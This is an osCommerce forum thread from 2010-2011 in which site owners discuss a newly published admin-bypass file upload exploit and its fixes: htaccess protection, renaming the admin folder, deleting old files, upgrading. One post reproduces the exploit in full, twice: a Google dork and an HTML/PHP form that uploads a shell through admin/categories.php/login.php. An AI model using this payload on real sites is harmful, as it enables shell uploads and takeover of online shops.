Is there any fix for the new exploit that is out today?
oscommerce remote upload from categories.php
?
Latest News: (loading..)
0
12 replies to this topic
#2
Posted 20 November 2010, 23:37
I think this has already been discussed - htaccess of the admin folder etc etc
I could be wrong and no doubt if I am I'm sure if this is a new exploit some of the php gurus will soon have something to say.....
I could be wrong and no doubt if I am I'm sure if this is a new exploit some of the php gurus will soon have something to say.....
I'm feeling lucky today......maybe someone will answer my post!
I do try and answer a simple post when I can just to give something back.
------------------------------------------------
PM me? - I'm not for hire
I do try and answer a simple post when I can just to give something back.
------------------------------------------------
PM me? - I'm not for hire
#3
-
- Community Sponsor
-
- 10,464 posts
- Real Name:Chris Dunn
- Gender:Male
- Location:Tecumseh, Ontario, Canada N8N 1X8
Posted 21 November 2010, 01:48
It is an OLD exploit using file_manager.php and define_language.php. REMOVE those files from the admin directory, the languages directory and also remove the link from tools.php.
Refer to this thread for more information:
Admin Security
Chris
Refer to this thread for more information:
Admin Security
Chris
Edited by DunWeb, 21 November 2010, 01:48.
:|: Was this post helpful ? Click the LIKE THIS button :|:
:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:
:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:
:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:
:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:
#5
-
- Community Member
- 44 posts
- Real Name:costel croitoru
- Gender:Male
- Location:olula del rio almeria spain
Posted 21 November 2010, 11:25
Hi there,
this is the new exploit, he was published today:
oscommerce remote upload from categories.php
# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]
exploit:
<html>
<head>
<title>Download</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>
[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Ă„len#Sami(s-man)#zone-h/crew#all tunisian hackers]
[~] Home :info-geek.com/ # v4-team.com/cc/
this is the new exploit, he was published today:
oscommerce remote upload from categories.php
# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]
exploit:
<html>
<head>
<title>Download</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>
[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Ă„len#Sami(s-man)#zone-h/crew#all tunisian hackers]
[~] Home :info-geek.com/ # v4-team.com/cc/
#6
Posted 21 November 2010, 11:32
firstbizsoft, on 21 November 2010, 11:25, said:
this is the new exploit, he was published today:
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
Avoid the most asked question. See How to Secure My Site and How do I...?
#7
-
- Community Member
- 44 posts
- Real Name:costel croitoru
- Gender:Male
- Location:olula del rio almeria spain
Posted 21 November 2010, 11:36
Yes, thats right. "If you have secured the admin directory and changed it's name then this exploit will fail." Working too if you don't change the admin directory name.
#9
Posted 26 March 2011, 08:30
mamatemplate, on 26 March 2011, 01:45, said:
its pointless to install any osc site without a minimum of security measures, out there are robots able to hack any unsecured osc site ten times any single day. I suggest to secure first and install after.
It is pointless to install ANY website without security measures
In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?
Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering
Edited by Xpajun, 26 March 2011, 08:31.
Currently...:
Working with osCommerce 2.3.1
Add-Ons so far Installed:
Add date and order number to invoice and packing slip,
Products Cycle Slideshow,
Detailed Monthly Sales,
Holiday Settings,
Tracking Module for 2.3
Working with osCommerce 2.3.1
Add-Ons so far Installed:
Add date and order number to invoice and packing slip,
Products Cycle Slideshow,
Detailed Monthly Sales,
Holiday Settings,
Tracking Module for 2.3
#10
Posted 08 April 2011, 22:45
This hack exploits the PHP basename function in admin directories where htaccess is not used to control logins. The code in admin/includes/application_top.php can be amended to stop this hack - but the safest solution, as mentioned above, is to use htaccess in the admin directory.
Your online success is Paramount.
#11
Posted 09 April 2011, 07:28
Or just upgrade to 2.3.1 where this exploit isn't possible 
Mark Evans
osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)
---------------------------------------
Software is like sex: It's better when it's free. (Linus Torvalds)
osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)
---------------------------------------
Software is like sex: It's better when it's free. (Linus Torvalds)
#12
Posted 09 April 2011, 11:27
Completely agree. It is not only oscommerce that is targetted... WordPress, Joomla, Drupal and even custom sites, if not secured
will be attacked (and probably hacked).
will be attacked (and probably hacked).
Xpajun, on 26 March 2011, 08:30, said:
It is pointless to install ANY website without security measures
In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?
Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering
In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?
Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering
#13
Posted 09 April 2011, 12:05
The best thing you can do for your web content is keep your site up to date with the latest code. That is the most secure practice albeit not always the easiest thing to do.
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here
